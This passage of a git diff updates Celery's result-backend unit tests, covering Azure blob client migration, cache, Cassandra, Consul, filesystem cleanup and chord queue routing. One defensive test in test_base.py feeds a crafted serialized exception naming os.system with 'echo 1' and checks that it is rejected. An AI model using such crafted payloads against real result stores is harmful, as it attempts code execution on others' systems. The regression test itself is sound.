assert x.http_protocol == 'http'
assert x.arangodb_url == 'http://test.arangodb.com:8529'
+ assert x.verify is False
def test_backend_cleanup(self):
now = datetime.datetime.utcnow()
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index 75ba90baa97..479fd855838 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -1,5 +1,6 @@
import os
import socket
+import sys
import threading
import time
from unittest.mock import Mock, patch
@@ -12,6 +13,7 @@
from celery.utils import cached_property
pytest.importorskip('gevent')
+pytest.importorskip('eventlet')
@pytest.fixture(autouse=True)
@@ -140,6 +142,10 @@ def test_drain_timeout(self):
assert on_interval.call_count < 20, 'Should have limited number of calls to on_interval'
+@pytest.mark.skipif(
+ sys.platform == "win32",
+ reason="hangs forever intermittently on windows"
+)
class test_EventletDrainer(DrainerTests):
@pytest.fixture(autouse=True)
def setup_drainer(self):
@@ -152,7 +158,11 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import eventlet
- eventlet.sleep(0)
+
+ # `drain_events` of asynchronous backends with pubsub have to sleep
+ # while waiting events for not more then `interval` timeout,
+ # but events may coming sooner
+ eventlet.sleep(timeout/10)
def schedule_thread(self, thread):
import eventlet
@@ -198,7 +208,11 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import gevent
- gevent.sleep(0)
+
+ # `drain_events` of asynchronous backends with pubsub have to sleep
+ # while waiting events for not more then `interval` timeout,
+ # but events may coming sooner
+ gevent.sleep(timeout/10)
def schedule_thread(self, thread):
import gevent
diff --git a/t/unit/backends/test_azureblockblob.py b/t/unit/backends/test_azureblockblob.py
index 969993290d4..5329140627f 100644
--- a/t/unit/backends/test_azureblockblob.py
+++ b/t/unit/backends/test_azureblockblob.py
@@ -10,6 +10,7 @@
MODULE_TO_MOCK = "celery.backends.azureblockblob"
pytest.importorskip('azure.storage.blob')
+pytest.importorskip('azure.core.exceptions')
class test_AzureBlockBlobBackend:
@@ -25,6 +26,10 @@ def setup(self):
app=self.app,
url=self.url)
+ @pytest.fixture(params=['', 'my_folder/'])
+ def base_path(self, request):
+ return request.param
+
def test_missing_third_party_sdk(self):
azurestorage = azureblockblob.azurestorage
try:
@@ -41,55 +46,149 @@ def test_bad_connection_url(self):
with pytest.raises(ImproperlyConfigured):
AzureBlockBlobBackend._parse_url("")
- @patch(MODULE_TO_MOCK + ".BlockBlobService")
+ @patch(MODULE_TO_MOCK + ".BlobServiceClient")
def test_create_client(self, mock_blob_service_factory):
- mock_blob_service_instance = Mock()
- mock_blob_service_factory.return_value = mock_blob_service_instance
+ mock_blob_service_client_instance = Mock()
+ mock_blob_service_factory.from_connection_string.return_value = mock_blob_service_client_instance
backend = AzureBlockBlobBackend(app=self.app, url=self.url)
# ensure container gets created on client access...
- assert mock_blob_service_instance.create_container.call_count == 0
- assert backend._client is not None
- assert mock_blob_service_instance.create_container.call_count == 1
+ assert mock_blob_service_client_instance.create_container.call_count == 0
+ assert backend._blob_service_client is not None
+ assert mock_blob_service_client_instance.create_container.call_count == 1
# ...but only once per backend instance
- assert backend._client is not None
- assert mock_blob_service_instance.create_container.call_count == 1
-
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
- def test_get(self, mock_client):
+ assert backend._blob_service_client is not None
+ assert mock_blob_service_client_instance.create_container.call_count == 1
+
+ @patch(MODULE_TO_MOCK + ".BlobServiceClient")
+ def test_configure_client(self, mock_blob_service_factory):
+
+ connection_timeout = 3
+ read_timeout = 11
+ self.app.conf.update(
+ {
+ 'azureblockblob_connection_timeout': connection_timeout,
+ 'azureblockblob_read_timeout': read_timeout,
+ }
+ )
+
+ mock_blob_service_client_instance = Mock()
+ mock_blob_service_factory.from_connection_string.return_value = (
+ mock_blob_service_client_instance
+ )
+
+ base_url = "azureblockblob://"
+ connection_string = "connection_string"
+ backend = AzureBlockBlobBackend(
+ app=self.app, url=f'{base_url}{connection_string}'
+ )
+
+ client = backend._blob_service_client
+ assert client is mock_blob_service_client_instance
+
+ (
+ mock_blob_service_factory
+ .from_connection_string
+ .assert_called_once_with(
+ connection_string,
+ connection_timeout=connection_timeout,
+ read_timeout=read_timeout
+ )
+ )
+
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
+ def test_get(self, mock_client, base_path):
+ self.backend.base_path = base_path
self.backend.get(b"mykey")
- mock_client.get_blob_to_text.assert_called_once_with(
- "celery", "mykey")
+ mock_client.get_blob_client \
+ .assert_called_once_with(blob=base_path + "mykey", container="celery")
+
+ mock_client.get_blob_client.return_value \
+ .download_blob.return_value \
+ .readall.return_value \
+ .decode.assert_called_once()
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
def test_get_missing(self, mock_client):
- mock_client.get_blob_to_text.side_effect = \
- azureblockblob.AzureMissingResourceHttpError("Missing", 404)
+ mock_client.get_blob_client.return_value \
+ .download_blob.return_value \
+ .readall.side_effect = azureblockblob.ResourceNotFoundError
assert self.backend.get(b"mykey") is None
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
- def test_set(self, mock_client):
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
+ def test_set(self, mock_client, base_path):
+ self.backend.base_path = base_path
self.backend._set_with_state(b"mykey", "myvalue", states.SUCCESS)
- mock_client.create_blob_from_text.assert_called_once_with(
- "celery", "mykey", "myvalue")
+ mock_client.get_blob_client.assert_called_once_with(
+ container="celery", blob=base_path + "mykey")
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
- def test_mget(self, mock_client):
+ mock_client.get_blob_client.return_value \
+ .upload_blob.assert_called_once_with("myvalue", overwrite=True)
+
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
+ def test_mget(self, mock_client, base_path):
keys = [b"mykey1", b"mykey2"]
+ self.backend.base_path = base_path
self.backend.mget(keys)
- mock_client.get_blob_to_text.assert_has_calls(
- [call("celery", "mykey1"),
- call("celery", "mykey2")])
+ mock_client.get_blob_client.assert_has_calls(
+ [call(blob=base_path + key.decode(), container='celery') for key in keys],
+ any_order=True,)
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
- def test_delete(self, mock_client):
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
+ def test_delete(self, mock_client, base_path):
+ self.backend.base_path = base_path
self.backend.delete(b"mykey")
- mock_client.delete_blob.assert_called_once_with(
- "celery", "mykey")
+ mock_client.get_blob_client.assert_called_once_with(
+ container="celery", blob=base_path + "mykey")
+
+ mock_client.get_blob_client.return_value \
+ .delete_blob.assert_called_once()
+
+ def test_base_path_conf(self, base_path):
+ self.app.conf.azureblockblob_base_path = base_path
+ backend = AzureBlockBlobBackend(
+ app=self.app,
+ url=self.url
+ )
+ assert backend.base_path == base_path
+
+ def test_base_path_conf_default(self):
+ backend = AzureBlockBlobBackend(
+ app=self.app,
+ url=self.url
+ )
+ assert backend.base_path == ''
+
+
+class test_as_uri:
+ def setup(self):
+ self.url = (
+ "azureblockblob://"
+ "DefaultEndpointsProtocol=protocol;"
+ "AccountName=name;"
+ "AccountKey=account_key;"
+ "EndpointSuffix=suffix"
+ )
+ self.backend = AzureBlockBlobBackend(
+ app=self.app,
+ url=self.url
+ )
+
+ def test_as_uri_include_password(self):
+ assert self.backend.as_uri(include_password=True) == self.url
+
+ def test_as_uri_exclude_password(self):
+ assert self.backend.as_uri(include_password=False) == (
+ "azureblockblob://"
+ "DefaultEndpointsProtocol=protocol;"
+ "AccountName=name;"
+ "AccountKey=**;"
+ "EndpointSuffix=suffix"
+ )
diff --git a/t/unit/backends/test_base.py b/t/unit/backends/test_base.py
index fbcda1ceb3e..203cbfdd534 100644
--- a/t/unit/backends/test_base.py
+++ b/t/unit/backends/test_base.py
@@ -1,6 +1,6 @@
-import sys
+import re
from contextlib import contextmanager
-from unittest.mock import ANY, Mock, call, patch, sentinel
+from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel
import pytest
from kombu.serialization import prepare_accept_content
@@ -12,7 +12,7 @@
from celery.backends.base import (BaseBackend, DisabledBackend,
KeyValueStoreBackend, _nulldict)
from celery.exceptions import (BackendGetMetaError, BackendStoreError,
- ChordError, TimeoutError)
+ ChordError, SecurityError, TimeoutError)
from celery.result import result_from_tuple
from celery.utils import serialization
from celery.utils.functional import pass1
@@ -190,26 +190,36 @@ def test_on_chord_part_return(self):
def test_apply_chord(self, unlock='celery.chord_unlock'):
self.app.tasks[unlock] = Mock()
- header_result = self.app.GroupResult(
+ header_result_args = (
uuid(),
[self.app.AsyncResult(x) for x in range(3)],
)
- self.b.apply_chord(header_result, self.callback.s())
+ self.b.apply_chord(header_result_args, self.callback.s())
assert self.app.tasks[unlock].apply_async.call_count
def test_chord_unlock_queue(self, unlock='celery.chord_unlock'):
self.app.tasks[unlock] = Mock()
- header_result = self.app.GroupResult(
+ header_result_args = (
uuid(),
[self.app.AsyncResult(x) for x in range(3)],
)
body = self.callback.s()
- self.b.apply_chord(header_result, body)
+ self.b.apply_chord(header_result_args, body)
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
- assert called_kwargs['queue'] is None
+ assert called_kwargs['queue'] == 'testcelery'
+
+ routing_queue = Mock()
+ routing_queue.name = "routing_queue"
+ self.app.amqp.router.route = Mock(return_value={
+ "queue": routing_queue
+ })
+ self.b.apply_chord(header_result_args, body)
+ assert self.app.amqp.router.route.call_args[0][1] == body.name
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs["queue"] == "routing_queue"
- self.b.apply_chord(header_result, body.set(queue='test_queue'))
+ self.b.apply_chord(header_result_args, body.set(queue='test_queue'))
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
assert called_kwargs['queue'] == 'test_queue'
@@ -217,10 +227,25 @@ def test_chord_unlock_queue(self, unlock='celery.chord_unlock'):
def callback_queue(result):
pass
- self.b.apply_chord(header_result, callback_queue.s())
+ self.b.apply_chord(header_result_args, callback_queue.s())
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
assert called_kwargs['queue'] == 'test_queue_two'
+ with self.Celery() as app2:
+ @app2.task(name='callback_different_app', shared=False)
+ def callback_different_app(result):
+ pass
+
+ callback_different_app_signature = self.app.signature('callback_different_app')
+ self.b.apply_chord(header_result_args, callback_different_app_signature)
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs['queue'] == 'routing_queue'
+
+ callback_different_app_signature.set(queue='test_queue_three')
+ self.b.apply_chord(header_result_args, callback_different_app_signature)
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs['queue'] == 'test_queue_three'
+
class test_exception_pickle:
def test_BaseException(self):
@@ -258,7 +283,6 @@ def test_json_exception_arguments(self):
y = self.b.exception_to_python(x)
assert isinstance(y, Exception)
- @pytest.mark.skipif(sys.version_info < (3, 3), reason='no qualname support')
def test_json_exception_nested(self):
self.b.serializer = 'json'
x = self.b.prepare_exception(objectexception.Nested('msg'))
@@ -276,10 +300,7 @@ def test_impossible(self):
assert str(x)
y = self.b.exception_to_python(x)
assert y.__class__.__name__ == 'Impossible'
- if sys.version_info < (2, 5):
- assert y.__class__.__module__
- else:
- assert y.__class__.__module__ == 'foo.module'
+ assert y.__class__.__module__ == 'foo.module'
def test_regular(self):
self.b.serializer = 'pickle'
@@ -322,7 +343,7 @@ def delete(self, key):
class DictBackend(BaseBackend):
def __init__(self, *args, **kwargs):
- BaseBackend.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
self._data = {'can-delete': {'result': 'foo'}}
def _restore_group(self, group_id):
@@ -403,9 +424,6 @@ def test_fail_from_current_stack(self):
self.b.mark_as_failure = Mock()
frame_list = []
- if (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear = Mock()
-
def raise_dummy():
frame_str_temp = str(inspect.currentframe().__repr__)
frame_list.append(frame_str_temp)
@@ -420,14 +438,11 @@ def raise_dummy():
assert args[1] is exc
assert args[2]
- if sys.version_info >= (3, 5, 0):
- tb_ = exc.__traceback__
- while tb_ is not None:
- if str(tb_.tb_frame.__repr__) == frame_list[0]:
- assert len(tb_.tb_frame.f_locals) == 0
- tb_ = tb_.tb_next
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear.assert_called()
+ tb_ = exc.__traceback__
+ while tb_ is not None:
+ if str(tb_.tb_frame.__repr__) == frame_list[0]:
+ assert len(tb_.tb_frame.f_locals) == 0
+ tb_ = tb_.tb_next
def test_prepare_value_serializes_group_result(self):
self.b.serializer = 'json'
@@ -545,22 +560,53 @@ def test_mark_as_revoked__chord(self):
b.on_chord_part_return.assert_called_with(request, states.REVOKED, ANY)
def test_chord_error_from_stack_raises(self):
+ class ExpectedException(Exception):
+ pass
+
b = BaseBackend(app=self.app)
- exc = KeyError()
- callback = Mock(name='callback')
+ callback = MagicMock(name='callback')
callback.options = {'link_error': []}
+ callback.keys.return_value = []
task = self.app.tasks[callback.task] = Mock()
b.fail_from_current_stack = Mock()
- group = self.patching('celery.group')
- group.side_effect = exc
- b.chord_error_from_stack(callback, exc=ValueError())
+ self.patching('celery.group')
+ with patch.object(
+ b, "_call_task_errbacks", side_effect=ExpectedException()
+ ) as mock_call_errbacks:
+ b.chord_error_from_stack(callback, exc=ValueError())
task.backend.fail_from_current_stack.assert_called_with(
- callback.id, exc=exc)
+ callback.id, exc=mock_call_errbacks.side_effect,
+ )
def test_exception_to_python_when_None(self):
b = BaseBackend(app=self.app)
assert b.exception_to_python(None) is None
+ def test_not_an_actual_exc_info(self):
+ pass
+
+ def test_not_an_exception_but_a_callable(self):
+ x = {
+ 'exc_message': ('echo 1',),
+ 'exc_type': 'system',
+ 'exc_module': 'os'
+ }
+
+ with pytest.raises(SecurityError,
+ match=re.escape(r"Expected an exception class, got os.system with payload ('echo 1',)")):
+ self.b.exception_to_python(x)
+
+ def test_not_an_exception_but_another_object(self):
+ x = {
+ 'exc_message': (),
+ 'exc_type': 'object',
+ 'exc_module': 'builtins'
+ }
+
+ with pytest.raises(SecurityError,
+ match=re.escape(r"Expected an exception class, got builtins.object with payload ()")):
+ self.b.exception_to_python(x)
+
def test_exception_to_python_when_attribute_exception(self):
b = BaseBackend(app=self.app)
test_exception = {'exc_type': 'AttributeDoesNotExist',
@@ -797,6 +843,18 @@ def callback(result):
callback.backend.fail_from_current_stack = Mock()
yield task, deps, cb
+ def test_chord_part_return_timeout(self):
+ with self._chord_part_context(self.b) as (task, deps, _):
+ try:
+ self.app.conf.result_chord_join_timeout += 1.0
+ self.b.on_chord_part_return(task.request, 'SUCCESS', 10)
+ finally:
+ self.app.conf.result_chord_join_timeout -= 1.0
+
+ self.b.expire.assert_not_called()
+ deps.delete.assert_called_with()
+ deps.join_native.assert_called_with(propagate=True, timeout=4.0)
+
def test_chord_part_return_propagate_set(self):
with self._chord_part_context(self.b) as (task, deps, _):
self.b.on_chord_part_return(task.request, 'SUCCESS', 10)
@@ -859,15 +917,15 @@ def test_restore_group_from_pickle(self):
def test_chord_apply_fallback(self):
self.b.implements_incr = False
self.b.fallback_chord_unlock = Mock()
- header_result = self.app.GroupResult(
+ header_result_args = (
'group_id',
[self.app.AsyncResult(x) for x in range(3)],
)
self.b.apply_chord(
- header_result, 'body', foo=1,
+ header_result_args, 'body', foo=1,
)
self.b.fallback_chord_unlock.assert_called_with(
- header_result, 'body', foo=1,
+ self.app.GroupResult(*header_result_args), 'body', foo=1,
)
def test_get_missing_meta(self):
diff --git a/t/unit/backends/test_cache.py b/t/unit/backends/test_cache.py
index 6bd23d9d3d2..40ae4277331 100644
--- a/t/unit/backends/test_cache.py
+++ b/t/unit/backends/test_cache.py
@@ -4,12 +4,12 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from kombu.utils.encoding import ensure_bytes, str_to_bytes
from celery import signature, states, uuid
from celery.backends.cache import CacheBackend, DummyClient, backends
from celery.exceptions import ImproperlyConfigured
+from t.unit import conftest
class SomeClass:
@@ -35,6 +35,16 @@ def test_no_backend(self):
with pytest.raises(ImproperlyConfigured):
CacheBackend(backend=None, app=self.app)
+ def test_memory_client_is_shared(self):
+ """This test verifies that memory:// backend state is shared over multiple threads"""
+ from threading import Thread
+ t = Thread(
+ target=lambda: CacheBackend(backend='memory://', app=self.app).set('test', 12345)
+ )
+ t.start()
+ t.join()
+ assert self.tb.client.get('test') == 12345
+
def test_mark_as_done(self):
assert self.tb.get_state(self.tid) == states.PENDING
assert self.tb.get_result(self.tid) is None
@@ -61,12 +71,12 @@ def test_mark_as_failure(self):
def test_apply_chord(self):
tb = CacheBackend(backend='memory://', app=self.app)
- result = self.app.GroupResult(
+ result_args = (
uuid(),
[self.app.AsyncResult(uuid()) for _ in range(3)],
)
- tb.apply_chord(result, None)
- assert self.app.GroupResult.restore(result.id, backend=tb) == result
+ tb.apply_chord(result_args, None)
+ assert self.app.GroupResult.restore(result_args[0], backend=tb) == self.app.GroupResult(*result_args)
@patch('celery.result.GroupResult.restore')
def test_on_chord_part_return(self, restore):
@@ -81,12 +91,12 @@ def test_on_chord_part_return(self, restore):
self.app.tasks['foobarbaz'] = task
task.request.chord = signature(task)
- result = self.app.GroupResult(
+ result_args = (
uuid(),
[self.app.AsyncResult(uuid()) for _ in range(3)],
)
- task.request.group = result.id
- tb.apply_chord(result, None)
+ task.request.group = result_args[0]
+ tb.apply_chord(result_args, None)
deps.join_native.assert_not_called()
tb.on_chord_part_return(task.request, 'SUCCESS', 10)
@@ -138,7 +148,7 @@ def test_regression_worker_startup_info(self):
'cache+memcached://127.0.0.1:11211;127.0.0.2:11211;127.0.0.3/'
)
worker = self.app.Worker()
- with mock.stdouts():
+ with conftest.stdouts():
worker.on_start()
assert worker.startup_info()
@@ -191,31 +201,31 @@ class test_get_best_memcache(MockCacheMixin):
def test_pylibmc(self):
with self.mock_pylibmc():
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
assert cache.get_best_memcache()[0].__module__ == 'pylibmc'
- def test_memcache(self):
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- assert (cache.get_best_memcache()[0]().__module__ ==
- 'memcache')
-
- def test_no_implementations(self):
- with mock.mask_modules('pylibmc', 'memcache'):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
- with pytest.raises(ImproperlyConfigured):
- cache.get_best_memcache()
+ assert (cache.get_best_memcache()[0]().__module__ ==
+ 'memcache')
+
+ @pytest.mark.masked_modules('pylibmc', 'memcache')
+ def test_no_implementations(self, mask_modules):
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ with pytest.raises(ImproperlyConfigured):
+ cache.get_best_memcache()
def test_cached(self):
with self.mock_pylibmc():
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
cache.get_best_memcache()[0](behaviors={'foo': 'bar'})
@@ -231,30 +241,30 @@ def test_backends(self):
class test_memcache_key(MockCacheMixin):
- def test_memcache_unicode_key(self):
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache_unicode_key(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- task_id, result = str(uuid()), 42
- b = cache.CacheBackend(backend='memcache', app=self.app)
- b.store_result(task_id, result, state=states.SUCCESS)
- assert b.get_result(task_id) == result
-
- def test_memcache_bytes_key(self):
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ task_id, result = str(uuid()), 42
+ b = cache.CacheBackend(backend='memcache', app=self.app)
+ b.store_result(task_id, result, state=states.SUCCESS)
+ assert b.get_result(task_id) == result
+
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache_bytes_key(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- task_id, result = str_to_bytes(uuid()), 42
- b = cache.CacheBackend(backend='memcache', app=self.app)
- b.store_result(task_id, result, state=states.SUCCESS)
- assert b.get_result(task_id) == result
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ task_id, result = str_to_bytes(uuid()), 42
+ b = cache.CacheBackend(backend='memcache', app=self.app)
+ b.store_result(task_id, result, state=states.SUCCESS)
+ assert b.get_result(task_id) == result
def test_pylibmc_unicode_key(self):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
with self.mock_pylibmc():
from celery.backends import cache
cache._imp = [None]
@@ -264,7 +274,7 @@ def test_pylibmc_unicode_key(self):
assert b.get_result(task_id) == result
def test_pylibmc_bytes_key(self):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
with self.mock_pylibmc():
from celery.backends import cache
cache._imp = [None]
diff --git a/t/unit/backends/test_cassandra.py b/t/unit/backends/test_cassandra.py
index 3e648bff0ed..5df53a1e576 100644
--- a/t/unit/backends/test_cassandra.py
+++ b/t/unit/backends/test_cassandra.py
@@ -3,7 +3,6 @@
from unittest.mock import Mock
import pytest
-from case import mock
from celery import states
from celery.exceptions import ImproperlyConfigured
@@ -17,7 +16,6 @@
]
-@mock.module(*CASSANDRA_MODULES)
class test_CassandraBackend:
def setup(self):
@@ -27,7 +25,8 @@ def setup(self):
cassandra_table='task_results',
)
- def test_init_no_cassandra(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_init_no_cassandra(self, module):
# should raise ImproperlyConfigured when no python-driver
# installed.
from celery.backends import cassandra as mod
@@ -38,7 +37,8 @@ def test_init_no_cassandra(self, *modules):
finally:
mod.cassandra = prev
- def test_init_with_and_without_LOCAL_QUROM(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_init_with_and_without_LOCAL_QUROM(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
@@ -60,12 +60,14 @@ def test_init_with_and_without_LOCAL_QUROM(self, *modules):
app=self.app, keyspace='b', column_family='c',
)
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
@pytest.mark.usefixtures('depends_on_current_app')
- def test_reduce(self, *modules):
+ def test_reduce(self, module):
from celery.backends.cassandra import CassandraBackend
assert loads(dumps(CassandraBackend(app=self.app)))
- def test_get_task_meta_for(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_get_task_meta_for(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
@@ -95,7 +97,8 @@ def test_as_uri(self):
x.as_uri()
x.as_uri(include_password=False)
- def test_store_result(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_store_result(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
diff --git a/t/unit/backends/test_consul.py b/t/unit/backends/test_consul.py
index 4e13ab9d8a5..61fb5d41afd 100644
--- a/t/unit/backends/test_consul.py
+++ b/t/unit/backends/test_consul.py
@@ -22,10 +22,21 @@ def test_consul_consistency(self):
def test_get(self):
index = 100
data = {'Key': 'test-consul-1', 'Value': 'mypayload'}
- self.backend.client = Mock(name='c.client')
- self.backend.client.kv.get.return_value = (index, data)
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.kv.get.return_value = (index, data)
assert self.backend.get(data['Key']) == 'mypayload'
+ def test_set(self):
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.session.create.return_value = 'c8dfa770-4ea3-2ee9-d141-98cf0bfe9c59'
+ self.backend.one_client.kv.put.return_value = True
+ assert self.backend.set('Key', 'Value') is True
+
+ def test_delete(self):
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.kv.delete.return_value = True
+ assert self.backend.delete('Key') is True
+
def test_index_bytes_key(self):
key = 'test-consul-2'
assert self.backend._key_to_consul_key(key) == key
diff --git a/t/unit/backends/test_couchbase.py b/t/unit/backends/test_couchbase.py
index a29110c9439..297735a38ba 100644
--- a/t/unit/backends/test_couchbase.py
+++ b/t/unit/backends/test_couchbase.py
@@ -13,7 +13,7 @@
try:
import couchbase
except ImportError:
- couchbase = None # noqa
+ couchbase = None
COUCHBASE_BUCKET = 'celery_bucket'
diff --git a/t/unit/backends/test_couchdb.py b/t/unit/backends/test_couchdb.py
index c8b4a43ec2c..41505594f72 100644
--- a/t/unit/backends/test_couchdb.py
+++ b/t/unit/backends/test_couchdb.py
@@ -11,7 +11,7 @@
try:
import pycouchdb
except ImportError:
- pycouchdb = None # noqa
+ pycouchdb = None
COUCHDB_CONTAINER = 'celery_container'
diff --git a/t/unit/backends/test_database.py b/t/unit/backends/test_database.py
index bff42361841..28e2fedbbbb 100644
--- a/t/unit/backends/test_database.py
+++ b/t/unit/backends/test_database.py
@@ -13,7 +13,8 @@
from celery.backends.database import (DatabaseBackend, retry, session, # noqa
session_cleanup)
from celery.backends.database.models import Task, TaskSet # noqa
-from celery.backends.database.session import SessionManager # noqa
+from celery.backends.database.session import ( # noqa
+ PREPARE_MODELS_MAX_RETRIES, ResultModelBase, SessionManager)
from t import skip # noqa
@@ -398,3 +399,28 @@ def test_coverage_madness(self):
SessionManager()
finally:
session.register_after_fork = prev
+
+ @patch('celery.backends.database.session.create_engine')
+ def test_prepare_models_terminates(self, create_engine):
+ """SessionManager.prepare_models has retry logic because the creation
+ of database tables by multiple workers is racy. This test patches
+ the used method to always raise, so we can verify that it does
+ eventually terminate.
+ """
+ from sqlalchemy.dialects.sqlite import dialect
+ from sqlalchemy.exc import DatabaseError
+
+ sqlite = dialect.dbapi()
+ manager = SessionManager()
+ engine = manager.get_engine('dburi')
+
+ def raise_err(bind):
+ raise DatabaseError("", "", [], sqlite.DatabaseError)
+
+ patch_create_all = patch.object(
+ ResultModelBase.metadata, 'create_all', side_effect=raise_err)
+
+ with pytest.raises(DatabaseError), patch_create_all as mock_create_all:
+ manager.prepare_models(engine)
+
+ assert mock_create_all.call_count == PREPARE_MODELS_MAX_RETRIES + 1
diff --git a/t/unit/backends/test_dynamodb.py b/t/unit/backends/test_dynamodb.py
index 62f50b6625b..6fd2625c0cb 100644
--- a/t/unit/backends/test_dynamodb.py
+++ b/t/unit/backends/test_dynamodb.py
@@ -13,7 +13,7 @@
class test_DynamoDBBackend:
def setup(self):
- self._static_timestamp = Decimal(1483425566.52) # noqa
+ self._static_timestamp = Decimal(1483425566.52)
self.app.conf.result_backend = 'dynamodb://'
@property
diff --git a/t/unit/backends/test_filesystem.py b/t/unit/backends/test_filesystem.py
index 98a37b2e070..4fb46683f4f 100644
--- a/t/unit/backends/test_filesystem.py
+++ b/t/unit/backends/test_filesystem.py
@@ -1,6 +1,9 @@
import os
import pickle
+import sys
import tempfile
+import time
+from unittest.mock import patch
import pytest
@@ -92,3 +95,36 @@ def test_forget_deletes_file(self):
def test_pickleable(self):
tb = FilesystemBackend(app=self.app, url=self.url, serializer='pickle')
assert pickle.loads(pickle.dumps(tb))
+
+ @pytest.mark.skipif(sys.platform == 'win32', reason='Test can fail on '
+ 'Windows/FAT due to low granularity of st_mtime')
+ def test_cleanup(self):
+ tb = FilesystemBackend(app=self.app, url=self.url)
+ yesterday_task_ids = [uuid() for i in range(10)]
+ today_task_ids = [uuid() for i in range(10)]
+ for tid in yesterday_task_ids:
+ tb.mark_as_done(tid, 42)
+ day_length = 0.2
+ time.sleep(day_length) # let FS mark some difference in mtimes
+ for tid in today_task_ids:
+ tb.mark_as_done(tid, 42)
+ with patch.object(tb, 'expires', 0):
+ tb.cleanup()
+ # test that zero expiration time prevents any cleanup
+ filenames = set(os.listdir(tb.path))
+ assert all(
+ tb.get_key_for_task(tid) in filenames
+ for tid in yesterday_task_ids + today_task_ids
+ )
+ # test that non-zero expiration time enables cleanup by file mtime
+ with patch.object(tb, 'expires', day_length):
+ tb.cleanup()
+ filenames = set(os.listdir(tb.path))
+ assert not any(
+ tb.get_key_for_task(tid) in filenames
+ for tid in yesterday_task_ids
+ )
+ assert all(
+ tb.get_key_for_task(tid) in filenames
+ for tid in today_task_ids
+ )
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index fb304b7e369..b56e928b026 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -1,11 +1,9 @@
import datetime
-import sys
from pickle import dumps, loads
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
import pytest
import pytz
-from case import mock
from kombu.exceptions import EncodeError
try:
@@ -16,6 +14,7 @@
from celery import states, uuid
from celery.backends.mongodb import Binary, InvalidDocument, MongoBackend
from celery.exceptions import ImproperlyConfigured
+from t.unit import conftest
COLLECTION = 'taskmeta_celery'
TASK_ID = uuid()
@@ -46,7 +45,6 @@ def setup(self):
self.patching('celery.backends.mongodb.MongoBackend.encode')
self.patching('celery.backends.mongodb.MongoBackend.decode')
self.patching('celery.backends.mongodb.Binary')
- self.patching('datetime.datetime')
self.backend = MongoBackend(app=self.app, url=self.default_url)
def test_init_no_mongodb(self, patching):
@@ -485,6 +483,12 @@ def test_cleanup(self, mock_get_database):
mock_get_database.assert_called_once_with()
